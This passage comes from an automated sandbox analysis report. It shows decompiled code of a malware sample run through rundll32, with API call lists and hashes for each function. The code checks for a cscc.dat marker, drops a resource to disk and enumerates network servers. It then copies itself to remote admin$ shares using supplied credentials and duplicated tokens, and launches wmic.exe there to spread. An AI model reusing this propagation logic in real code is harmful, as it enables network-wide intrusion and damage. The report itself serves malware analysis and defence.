				if(E007B7E69( &_v1572) == 0) {
					L4:
					return _t27;
				}
				_t12 = PathFileExistsW( &_v1572); // executed
				if(_t12 != 0) {
					ExitProcess(0);
				}
				_t16 = E007B6F7C(_t26, GetCurrentProcess());
				asm("sbb eax, eax");
				_t20 = E007B8313( ~( ~_t16) + 7,  &_v12,  &_v8); // executed
				if(_t20 != 0) {
					_t22 = E007B87E7(_v8,  &_v1572, _v12); // executed
					_t27 = _t22;
				}
				goto L4;
			}

0x007b7e8e
0x007b7e9f
0x007b7ea8
0x007b7ef7
0x007b7efb
0x007b7efb
0x007b7eb1
0x007b7eb9
0x007b7efd
0x007b7efd
0x007b7eca
0x007b7ed1
0x007b7ed8
0x007b7edf
0x007b7eef
0x007b7ef4
0x007b7ef6
0x00000000

APIs

Part of subcall function 007B7E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,007B7EA6,?), ref: 007B7E7C

PathFileExistsW.KERNELBASE(?,?), ref: 007B7EB1
GetCurrentProcess.KERNEL32(?,?), ref: 007B7EC3

Part of subcall function 007B6F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,007B7170,00000000,?,007B7AF8), ref: 007B6F8E
Part of subcall function 007B6F7C: GetProcAddress.KERNEL32(00000000), ref: 007B6F95

Part of subcall function 007B8313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 007B832A
Part of subcall function 007B8313: LoadResource.KERNEL32(00000000), ref: 007B8341
Part of subcall function 007B8313: LockResource.KERNEL32(00000000), ref: 007B8350
Part of subcall function 007B8313: SizeofResource.KERNEL32(00000000), ref: 007B8368
Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 007B8384
Part of subcall function 007B8313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007B838D
Part of subcall function 007B8313: memcpy.MSVCRT ref: 007B839C
Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 007B83B9
Part of subcall function 007B8313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B83BC
Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 007B840A
Part of subcall function 007B8313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B840D

Part of subcall function 007B87E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,007B11BB,?,?), ref: 007B87FC
Part of subcall function 007B87E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,007B11BB,?,?), ref: 007B8813
Part of subcall function 007B87E7: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,007B11BB,?,?), ref: 007B8824

ExitProcess.KERNEL32 ref: 007B7EFD

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Resource$File$AllocateFindPath$AddressChangeCloseCombineCreateCurrentExistsExitFreeHandleLoadLockModuleNotificationProcSizeofWritememcpy
String ID:
API String ID: 706652641-0
Opcode ID: a49e06a03efafaaf1370d65b9409bbf8852ff61f65512c713ddf6b322e46109b
Instruction ID: 6c0469cba4452187a2c1dde95cb5430f5b17fa434865125b8702b3fae8f7b272
Opcode Fuzzy Hash: a49e06a03efafaaf1370d65b9409bbf8852ff61f65512c713ddf6b322e46109b
Instruction Fuzzy Hash: 02F03C7690011DABEB20ABF4DC49FEE73ADAF48344F4441A1A901E2541EA3DDE05CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B6FAF Relevance: 4.5, APIs: 3, Instructions: 36
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B6FAF(long __ebx, long _a4, void* _a8) {
				void* _t6;
				int _t9;
				void* _t12;
				struct _OVERLAPPED* _t13;

				_t13 = 0;
				_t6 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 2, 0); // executed
				_t12 = _t6;
				if(_t12 != 0xffffffff) {
					_a4 = 0;
					_t9 = WriteFile(_t12, _a8, __ebx,  &_a4, 0); // executed
					if(_t9 != 0 && __ebx == _a4) {
						_t13 = 1;
					}
					CloseHandle(_t12);
				}
				return _t13;
			}

0x007b6fb4
0x007b6fc5
0x007b6fcb
0x007b6fd0
0x007b6fdb
0x007b6fdf
0x007b6fe7
0x007b6fee
0x007b6fee
0x007b6ff0
0x007b6ff0
0x007b6ffb

APIs

CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,007B7201,?,?,?,007B7AF8), ref: 007B6FC5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,007B7201,?,?,?,007B7AF8), ref: 007B6FDF
CloseHandle.KERNEL32(00000000,?,?,007B7201,?,?,?,007B7AF8), ref: 007B6FF0

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 54e946d271c96938b6a41788f18478042b41647fe694e7c56ce0f38cfd5cdd79
Instruction ID: 03f38730a8018321a8192a9a1e92d6ba77318000877ed62bbb3d6c616cd15c99
Opcode Fuzzy Hash: 54e946d271c96938b6a41788f18478042b41647fe694e7c56ce0f38cfd5cdd79
Instruction Fuzzy Hash: C4F0DA352011247ADB305A66EC48FEB7E6CEB457F1F108112FA0D86190D638D941D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 007B87E7 Relevance: 4.5, APIs: 3, Instructions: 35
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B87E7(long __ebx, long _a4, void* _a8) {
				void* _t5;
				int _t8;
				void* _t11;
				struct _OVERLAPPED* _t12;

				_t12 = 0;
				_t5 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
				_t11 = _t5;
				if(_t11 != 0xffffffff) {
					_t8 = WriteFile(_t11, _a8, __ebx,  &_a4, 0); // executed
					if(_t8 != 0 && _a4 == __ebx) {
						_t12 = 1;
					}
					FindCloseChangeNotification(_t11); // executed
				}
				return _t12;
			}

0x007b87ec
0x007b87fc
0x007b8802
0x007b8807
0x007b8813
0x007b881b
0x007b8822
0x007b8822
0x007b8824
0x007b8824
0x007b882f

APIs

CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,007B11BB,?,?), ref: 007B87FC
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,007B11BB,?,?), ref: 007B8813
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,007B11BB,?,?), ref: 007B8824

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: a29bc4bf8c5f389ba2e4618ba3c5b58dfe40d0b420d48a0bd11e200db7115e29
Instruction ID: 0f9770b92848537df736765d0663d4658546a0b9a54611f61192e35b67a9990e
Opcode Fuzzy Hash: a29bc4bf8c5f389ba2e4618ba3c5b58dfe40d0b420d48a0bd11e200db7115e29
Instruction Fuzzy Hash: 9BF01C32201024BBCB301E66EC4CFEBBE6CEF866F1B008225F90981060E634CD42D6E1

Uniqueness

Uniqueness Score: -1.00%

Function 007B751B Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E007B751B(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __esi;
				void** _t30;
				void* _t40;
				void* _t42;
				intOrPtr* _t43;
				void* _t44;

				_t44 = 0;
				_t30 =  &_v8;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				__imp__NetServerEnum(0, 0x65, _t30, 0xffffffff,  &_v12,  &_v20, _a8, _a12,  &_v16); // executed
				if(_t30 == 0 || _t30 == 0xea) {
					_t42 = _v8;
					_a12 = 1;
					if(_t42 == _t44) {
						goto L16;
					}
					_t40 = 0;
					if(_v12 <= _t44) {
						L13:
						goto L14;
					}
					_t43 = _t42 + 4;
					while(_t43 != 4) {
						if(( *(_t43 + 0xc) & 0x80000000) == 0) {
							if( *((intOrPtr*)(_t43 - 4)) == 0x1f4 && ( *(_t43 + 4) & 0x0000000f) > 4) {
								_t44 = 0;
								E007B6B95( *_t43, 0, _a4);
							}
						} else {
							E007B751B(_a4, 3,  *_t43);
						}
						_t43 = _t43 + 0x18;
						_t40 = _t40 + 1;
						if(_t40 < _v12) {
							continue;
						} else {
							goto L13;
						}
					}
					goto L13;
				} else {
					_a12 = 0;
					L14:
					if(_v8 != _t44) {
						NetApiBufferFree(_v8);
					}
					L16:
					return _a12;
				}
			}

0x007b7530
0x007b7539
0x007b7540
0x007b7543
0x007b7546
0x007b7549
0x007b754c
0x007b7554
0x007b7562
0x007b7565
0x007b756e
0x00000000
0x00000000
0x007b7571
0x007b7576
0x007b75c0
0x00000000
0x007b75c0
0x007b7578
0x007b757b
0x007b7589
0x007b75a0
0x007b75b0
0x007b75b2
0x007b75b2
0x007b758b
0x007b7592
0x007b7592
0x007b75b7
0x007b75ba
0x007b75be
0x00000000
0x00000000
0x00000000
0x00000000
0x007b75be
0x00000000
0x007b755d
0x007b755d
0x007b75c1
0x007b75c4
0x007b75c9
0x007b75c9
0x007b75cf
0x007b75d5
0x007b75d5

APIs

NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 007B754C
NetApiBufferFree.NETAPI32(?), ref: 007B75C9

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: BufferEnumFreeServer
String ID:
API String ID: 2429717511-0
Opcode ID: 8918e72fd67e2dc317c84aee11413f25d1281a901cf5fff900dca58397db3230
Instruction ID: 80975d87c4db1ae5107797cca8db16774abc027dc13e3da0d837f4fbedd7f728
Opcode Fuzzy Hash: 8918e72fd67e2dc317c84aee11413f25d1281a901cf5fff900dca58397db3230
Instruction Fuzzy Hash: 1F215EB6904219EBDB35DF94CC44BEEBB79FF84710F208516F811A6150E3799B60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007B7DD0 Relevance: 3.1, APIs: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E007B7DD0(void* __ecx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				void* _v8;
				signed int _t17;
				void** _t19;
				void* _t20;
				signed int _t22;
				signed int* _t23;
				signed int* _t24;
				void* _t26;
				void* _t27;
				signed int _t31;
				signed int _t32;
				signed int* _t35;
				signed int* _t36;
				void* _t38;
				signed int _t39;
				signed int _t41;
				signed int _t42;

				_t17 = E007B6477();
				_t39 = _t17;
				_t19 =  &_v8;
				asm("sbb esi, esi");
				_t27 = 0;
				_t2 = _t39 - 0x1e; // -30
				_t42 = _t41 & _t2;
				_v8 = 0;
				__imp__NetServerGetInfo(0, 0x65, _t19, 0x1e, _t38, _t41, _t26, __ecx); // executed
				_t20 = _v8;
				if(_t19 == 0 && ( *(_t20 + 0x10) & 0x00000018) != 0) {
					_t27 = 1;
				}
				if(_t20 != 0) {
					NetApiBufferFree(_t20);
				}
				if(_t27 != 0) {
					_t39 = _t39 + 0xf;
				}
				_t31 = 3;
				_t22 = _t39 / _t31;
				_t32 = 0xf;
				if(_t39 <= 0x1e) {
					_t12 = _t39 - 0xf; // -30
					asm("sbb ecx, ecx");
					_t32 = _t32 & _t12;
				}
				if(_t39 > 0xf) {
					_t39 = 0xf;
				}
				_t35 = _a4;
				if(_t35 != 0) {
					 *_t35 = _t42;
				}
				_t36 = _a12;
				if(_t36 != 0) {
					 *_t36 = _t22;
				}
				_t23 = _a16;
				if(_t23 != 0) {
					 *_t23 = _t32;
				}
				_t24 = _a8;
				if(_t24 != 0) {
					 *_t24 = _t39;
				}
				return _t24;
			}

0x007b7dd7
0x007b7dde
0x007b7de3
0x007b7de7
0x007b7de9
0x007b7ded
0x007b7df1
0x007b7df3
0x007b7df6
0x007b7dfe
0x007b7e01
0x007b7e09
0x007b7e09
0x007b7e0c
0x007b7e0f
0x007b7e0f
0x007b7e17
0x007b7e19
0x007b7e19
0x007b7e1e
0x007b7e23
0x007b7e27
0x007b7e2b
0x007b7e2f
0x007b7e32
0x007b7e34
0x007b7e34
0x007b7e39
0x007b7e3d
0x007b7e3d
0x007b7e3e
0x007b7e43
0x007b7e45
0x007b7e45
0x007b7e47
0x007b7e4c
0x007b7e4e
0x007b7e4e
0x007b7e50
0x007b7e55
0x007b7e57
0x007b7e57
0x007b7e59
0x007b7e5e
0x007b7e60
0x007b7e60
0x007b7e66

APIs

Part of subcall function 007B6477: GetTickCount.KERNEL32 ref: 007B6477

NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,007B7AA3,?,?,000000FF,?,?), ref: 007B7DF6
NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,007B7AA3,?,?,000000FF,?,?), ref: 007B7E0F

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: BufferCountFreeInfoServerTick
String ID:
API String ID: 2934114180-0
Opcode ID: 03441cde66ce682ecfe5e1b5f401b5ce0bb17366bb4e429bbdcbc895ab711d35
Instruction ID: 4381ae94e227670b3ffd3ce8e8f6bce73254fa13c1b792f1fcf4732d8c900997
Opcode Fuzzy Hash: 03441cde66ce682ecfe5e1b5f401b5ce0bb17366bb4e429bbdcbc895ab711d35
Instruction Fuzzy Hash: 2911B6727042099FE729CE69D885FEE77AAAFC0B10F1981A9E505CB180E778DD00D750

Uniqueness

Uniqueness Score: -1.00%

Function 007B6DA4 Relevance: 2.6, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B6DA4(signed int __eax, void* __ecx, struct _CRITICAL_SECTION* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _t35;
				signed int _t43;
				intOrPtr* _t48;
				signed int _t54;
				struct _CRITICAL_SECTION* _t56;

				_t56 = __esi;
				_v8 = _v8 & 0x00000000;
				_t43 = __eax;
				if(__esi == 0) {
					L8:
					return _v8;
				}
				EnterCriticalSection(__esi);
				_t54 = _t43;
				if(_t43 >=  *((intOrPtr*)(__esi + 0x24)) + _t43) {
					L7:
					LeaveCriticalSection(_t56);
					goto L8;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t35 =  *((intOrPtr*)(_t56 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4)))), _a4,  *((intOrPtr*)(_t56 + 0x1c)));
					_v8 = _t35;
					if(_t35 != 0) {
						break;
					}
					_t54 = _t54 + 1;
					if(_t54 <  *(_t56 + 0x24) + _t43) {
						continue;
					}
					goto L7;
				}
				_t48 = _a8;
				if(_t48 != 0) {
					 *_t48 =  *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4));
				}
				goto L7;
			}

0x007b6da4
0x007b6da8
0x007b6dad
0x007b6db1
0x007b6e13
0x007b6e18
0x007b6e18
0x007b6db5
0x007b6dc0
0x007b6dc4
0x007b6e0b
0x007b6e0c
0x00000000
0x00000000
0x00000000
0x00000000
0x007b6dc6
0x007b6dc6
0x007b6ddd
0x007b6de0
0x007b6de5
0x00000000
0x00000000
0x007b6dea
0x007b6def
0x00000000
0x00000000
0x00000000
0x007b6df1
0x007b6df3
0x007b6df8
0x007b6e09
0x007b6e09
0x00000000

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,?,007B6E98,?,00000000,?,?,007B6A84,?,?), ref: 007B6DB5
LeaveCriticalSection.KERNEL32(?,?,?,007B6E98,?,00000000,?,?,007B6A84,?,?), ref: 007B6E0C

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 034a4d50dc70ac34ec6fbcbd95db1e8bb9d5000e4af862f4c4eb02b6cade362c
Instruction ID: 858142f7a8304837146d8e76cf63c68ce68c12ec7abbc44b195c2a9899f65395
Opcode Fuzzy Hash: 034a4d50dc70ac34ec6fbcbd95db1e8bb9d5000e4af862f4c4eb02b6cade362c
Instruction Fuzzy Hash: 07116939700A059FCB25CF6AC880A9AB7E7FF993047054129E946C7311EB39ED128F94

Uniqueness

Uniqueness Score: -1.00%

Function 007B6AA8 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E007B6AA8(WCHAR* _a4, WCHAR* _a8) {
				signed int _t6;

				if(_a4 == 0 || _a8 == 0) {
					return 0;
				} else {
					_t6 = StrCmpIW(_a4, _a8); // executed
					asm("sbb eax, eax");
					return  ~_t6 + 1;
				}
			}

0x007b6aaf
0x00000000
0x007b6ab7
0x007b6abd
0x007b6ac5
0x00000000
0x007b6ac7

APIs

StrCmpIW.KERNELBASE(00000000,?), ref: 007B6ABD

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac50d7010277fc825519eb4936cf36d937557ea67c081d6560bd82a2dd7c78a3
Instruction ID: 17f66cdaaaab812d84aeb037726ca3f1fcfbee9b2147917bde41d7e60d54b276
Opcode Fuzzy Hash: ac50d7010277fc825519eb4936cf36d937557ea67c081d6560bd82a2dd7c78a3
Instruction Fuzzy Hash: 4BD05231154209EECF259E64CC08BF83BA8AB1031AF08C020BA0A941A0D27D8AA8DA80

Uniqueness

Uniqueness Score: -1.00%

Function 007BC493 Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007BC493(signed int _a8, signed int _a12) {
				void* _t5;

				_t5 = malloc(_a8 * _a12); // executed
				return _t5;
			}

0x007bc49e
0x007bc4a5

APIs

malloc.MSVCRT ref: 007BC49E

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
Instruction ID: ec8c23033456a1fe1ff62cabf26932a72bafa010f8e8f333c1f5c42a773456ca
Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
Instruction Fuzzy Hash: 55B0123311830DBB8F04FED8E987C9A73DCEEA4620B404406F91C8F141E935F7204669

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 007B9B63 Relevance: 73.8, APIs: 35, Strings: 7, Instructions: 296
shareprocessthreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E007B9B63(long _a4, short* _a8, short* _a12, signed int _a16) {
				long _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				void* _v40;
				void* _v44;
				void* _v52;
				void* _v56;
				void* _v60;
				short _v68;
				intOrPtr _v72;
				void _v112;
				char _v116;
				short* _v128;
				void _v144;
				struct _NETRESOURCE _v148;
				short _v668;
				char _v1188;
				short _v2748;
				short _v4796;
				short _v6844;
				short _v8892;
				short _v74428;
				void* __ebx;
				signed int _t112;
				WCHAR* _t130;
				void* _t141;
				int _t144;
				int _t150;
				long _t151;
				signed int _t163;
				int _t168;
				signed int _t173;
				long _t184;
				WCHAR* _t187;
				int _t189;
				signed int _t192;
				int _t199;
				void* _t205;

				E007BA760(0x122bc);
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				if(_a4 == 0) {
					_v8 = 0x57;
					L51:
					_t112 = _a16;
					__eflags = _t112;
					if(_t112 != 0) {
						 *_t112 = _v24;
					}
					SetLastError(_v8);
					return _v16;
				}
				_v668 = 0;
				wsprintfW( &_v668, L"\\\\%s\\admin$", _a4);
				_v148 = 0;
				_t192 = 7;
				memset( &_v144, 0, _t192 << 2);
				_v128 =  &_v668;
				_t199 = 1;
				_v144 = 1;
				E007B88D3( &_v1188);
				_t187 = L"\\\\%ws\\admin$\\%ws";
				wsprintfW( &_v6844, _t187, _a4,  &_v1188);
				_v4796 = 0;
				_v8892 = 0;
				wsprintfW( &_v4796, _t187, _a4,  &_v1188);
				_t130 = PathFindExtensionW( &_v4796);
				if(_t130 != 0) {
					 *_t130 = 0;
				}
				wsprintfW( &_v8892, _t187, _a4, L"cscc.dat");
				_v28 = _v28 & 0x00000000;
				while(1) {
					_v24 = WNetAddConnection2W( &_v148, _a12, _a8, 0);
					if(PathFileExistsW( &_v8892) != 0) {
						break;
					}
					_v8 = GetLastError();
					_t141 = E007B87E7( *0x7c7b94,  &_v6844,  *0x7c3984);
					_t189 = 0;
					if(_t141 != 0) {
						__eflags = _a8;
						if(_a8 != 0) {
							__eflags = _a12;
							if(_a12 != 0) {
								E007B68B5(_a8, _a12);
								 *0x7c3010 = _t199;
							}
						}
						_v20 = _t189;
						_v12 = _t189;
						_t144 = OpenThreadToken(GetCurrentThread(), 2, _t199,  &_v20);
						__eflags = _t144;
						if(_t144 != 0) {
							DuplicateTokenEx(_v20, 0x2000000, _t189, 2, _t199,  &_v12);
						}
						_v74428 = 0;
						_v2748 = 0;
						_v44 = _t189;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						memset( &_v112, _t189, 0x40);
						_v68 = 0;
						_v116 = 0x44;
						_v72 = 1;
						_t150 = GetSystemDirectoryW( &_v2748, 0x104);
						__eflags = _t150;
						if(_t150 == 0) {
							_t151 = GetLastError();
							goto L39;
						} else {
							PathAppendW( &_v2748, L"wbem\\wmic.exe");
							__eflags = PathFileExistsW( &_v2748);
							if(__eflags == 0) {
								L41:
								DeleteFileW( &_v6844);
								L43:
								__eflags = _v12 - _t189;
								if(_v12 != _t189) {
									CloseHandle(_v12);
									_v12 = _t189;
								}
								__eflags = _v20 - _t189;
								if(_v20 != _t189) {
									CloseHandle(_v20);
								}
								_t199 = 1;
								__eflags = 1;
								L48:
								__eflags = _v24;
								if(_v24 == 0) {
									WNetCancelConnection2W( &_v668, 0, _t199);
								}
								goto L51;
							}
							_t163 = E007B9972(_t205 + wsprintfW( &_v74428, L"%ws ",  &_v2748) * 2 - 0x122b8, __eflags, _a4, _a8, _a12);
							__eflags = _t163;
							if(_t163 == 0) {
								L37:
								_t151 = GetLastError();
								_t189 = 0;
								L39:
								_v8 = _t151;
								L40:
								__eflags = _v16 - _t189;
								if(_v16 != _t189) {
									goto L43;
								}
								goto L41;
							}
							_push( &_v44);
							_push( &_v116);
							_push(0);
							_push(0);
							_push(0x8000000);
							_push(0);
							_push(0);
							_push(0);
							_push( &_v74428);
							_push( &_v2748);
							__eflags = _v12;
							if(_v12 == 0) {
								_t168 = CreateProcessW();
							} else {
								_t168 = CreateProcessAsUserW(_v12, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
							}
							__eflags = _t168;
							if(_t168 == 0) {
								goto L37;
							} else {
								WaitForSingleObject(_v44, 0xffffffff);
								_a4 = 0;
								GetExitCodeProcess(_v44,  &_a4);
								__eflags = _v52;
								if(_v52 != 0) {
									CloseHandle(_v52);
								}
								__eflags = _v60;
								if(_v60 != 0) {
									CloseHandle(_v60);
								}
								__eflags = _v56;
								if(_v56 != 0) {
									CloseHandle(_v56);
								}
								__eflags = _v40;
								if(_v40 != 0) {
									CloseHandle(_v40);
								}
								__eflags = _v44;
								if(_v44 != 0) {
									CloseHandle(_v44);
								}
								__eflags = _a4;
								_t173 = 0 | _a4 == 0x00000000;
								_v16 = _t173;
								__eflags = _t173;
								if(_t173 != 0) {
									_t189 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_v16 = PathFileExistsW( &_v4796);
									_t189 = 0;
									goto L40;
								}
							}
						}
					}
					_t184 = GetLastError();
					_v8 = _t184;
					if(_t184 == 0x50 || _t184 == 0x35 || _t184 == 0x43 || _v24 != 0x4c3) {
						goto L48;
					} else {
						if(_v28 != 0) {
							goto L51;
						}
						WNetCancelConnection2W( &_v668, 0, _t199);
						_v28 = _t199;
						continue;
					}
				}
				_v16 = _t199;
				goto L48;
			}

0x007b9b6b
0x007b9b75
0x007b9b78
0x007b9b7b
0x007b9b81
0x007b9f01
0x007b9f08
0x007b9f08
0x007b9f0b
0x007b9f0d
0x007b9f12
0x007b9f12
0x007b9f17
0x007b9f24
0x007b9f24
0x007b9b92
0x007b9ba5
0x007b9baa
0x007b9bb4
0x007b9bbb
0x007b9bc3
0x007b9bce
0x007b9bd0
0x007b9bd6
0x007b9be5
0x007b9bf2
0x007b9bf6
0x007b9bfd
0x007b9c16
0x007b9c22
0x007b9c2a
0x007b9c2e
0x007b9c2e
0x007b9c41
0x007b9c46
0x007b9c4a
0x007b9c5f
0x007b9c71
0x00000000
0x00000000
0x007b9c85
0x007b9c8f
0x007b9c94
0x007b9c98
0x007b9cf3
0x007b9cf6
0x007b9cf8
0x007b9cfb
0x007b9d03
0x007b9d08
0x007b9d08
0x007b9cfb
0x007b9d15
0x007b9d18
0x007b9d22
0x007b9d28
0x007b9d2a
0x007b9d3c
0x007b9d3c
0x007b9d44
0x007b9d4b
0x007b9d52
0x007b9d58
0x007b9d59
0x007b9d5c
0x007b9d62
0x007b9d6c
0x007b9d7c
0x007b9d83
0x007b9d8a
